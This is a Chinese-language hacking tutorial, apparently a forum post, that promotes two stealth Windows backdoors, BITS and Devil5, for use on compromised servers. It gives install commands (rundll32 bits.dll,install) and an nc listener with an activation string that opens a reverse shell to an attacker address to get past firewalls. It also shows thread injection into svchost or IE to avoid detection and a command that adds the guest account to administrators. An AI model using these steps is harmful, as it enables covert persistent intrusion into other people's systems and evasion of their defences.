首先我们来简单解释一下什么是典型的"线程插入"后门:这种后门在运行时没有进程,所有网络操作均播入到其他应用程序的进程中完成。也就是说,即使受控制端安装的防火墙拥有“应用程序访问权限”的功能,也不能对这样的后门进行有效的警告和拦截,也就使对方的防火墙形同虚设了!这种后门是现在非常主流的一种,很让防护的人头疼,因为对它的查杀比较困难,这种后门本身的功能比较强大,是“居中家旅行、入侵攻击”的必备品哦!
这类的典范就是国内提倡网络共享的小榕的BITS了,从它的推出以来,各类安全工具下载园地里BITS就高居榜首,非常多的朋友使用它的过程中感到了方便。
BITS
类型:系统后门
使用范围:wind200/xp/2003
隐蔽程序:★★★★☆
使用难度:★★★☆☆
危害程序:★★★★☆
查杀难度:★★★★☆
BITS其实是Background Intelligent Transfer Servicer的缩写,可以在不知不觉中实现另一种意义的典型的线程插入后门,有以下特点:进程管理器中看不到;平时没有端口,只是在系统中充当卧底的角色;提供正向连接和反向连接两种功能;仅适合用于windows 200/xp/2003。
运用举例
首先我们用3389登录上肉鸡,确定你有SYSTEM的权限,将BITS.DLL拷贝到服务器上,执行CMD命令:
rundll32.exe bits.dll,install
这样就激活了BIST,程序用
这是最简单的使用,这个后门除了隐蔽性好外,还有两大特点是非常 值得借鉴的:端口复用和正反向连接。虽然很多朋友经常听到这两个名词,但并不了解它们,端口复用就是利用系统正常的TCP端口通讯和控制,比如80、139等,这样的后门有个非常 大的好处就是非常 隐蔽,不用自己开端口也不会暴露自己的访问,因为通讯本身就是系统的正常访问!另一个是反向连接,这个很常 见,也是后门中一个经典思路,因为从服务器上主动方问外边是不被禁止的,很多很历害的防火墙就怕这点!
BITS的正向连接很简单,大家可以参考它的README,这种方式在服务器没有防火墙等措施的时候很管用,可以方便地连接,但是遇到有防火墙这样的方式就不灵了,得使用下面的反向连接方式:
在本地使用NC监听(如:nc -l -p 1234)
用NC连接目标主机的任何一个防火墙允许的TCP端口(80/139/445……)
输入激活命令:[email=hkfx@dancewithdolphin[rxell]:1.1.1.1:2222]hkfx@dancewithdolphin[rxell]:1.1.1.1:2222[/email]
目标主机的CMD将会出现NC监听的端口2222,这样就实现了绕过防火墙的功能了。
devil5(魔鬼5号)
类型:系统后门
使用范围:win200/xp/2003
隐蔽程度:★★★★☆
使用难度:★★☆☆☆
危害程序:★★★★☆
查杀难度:★★★☆☆
同BITS一样,Devil5也是线程插入式的后门,和BITS不同的是它可以很方便的在GUI界面下按照自己的使用习惯定制端口和需要插入的线程,适合对系统有一定了解的使用都使用,由于是自定义插入线程,所以它更难被查杀,下面我们来看看它的使用。
运用举例:
道德使用它自带的配置程序EDITDEVIL5.EXE对后门进行常规的配置,包括控制端口、插入线程、连接密码、时间间隔等方面关键点是对插入线程的定制,一般设置成系统自带的SVCHOST,然后运行后门就可以控制了。
我们用TELNET连接上去,连接的格式是:TELNET *** 定制的端口,它和其他后门不同之处在于连接后没有提示的界面,每次执行程序也是分开的,必须要每次都有输入密码,比如我们丢掉了服务器和管账户,可以激活GUEST后再将GUEST加到管理员权限,记得每次执行命令后加上“>密码”就可以了:net localgroup administrators guest /add >hkfx,然后你又可以控制服务器了。
很明显示,同榕哥的BITS相比,DEVIL5有一些缺陷:不能通过系统自带端口通讯、执行命令比较麻烦,需要每次输入密码而且不回显示输入内容,很容易出错。但是,它有自己的优势:插入线程可以自已定制,比如设置IE的线程为插入的目标就比较难被查杀:自己提供了专门的查杀工具DELDEVIL5.exe,帮助防护者清理系统;而且它可以任意改名和绑定,使用灵活性上比BITS强……大家选择哪能款就看自己的喜好了。
另外,PortLess BackDoor等工具也是此类的后门,功能强大,隐蔽性稍差,大家有兴趣可以自己研究一下。
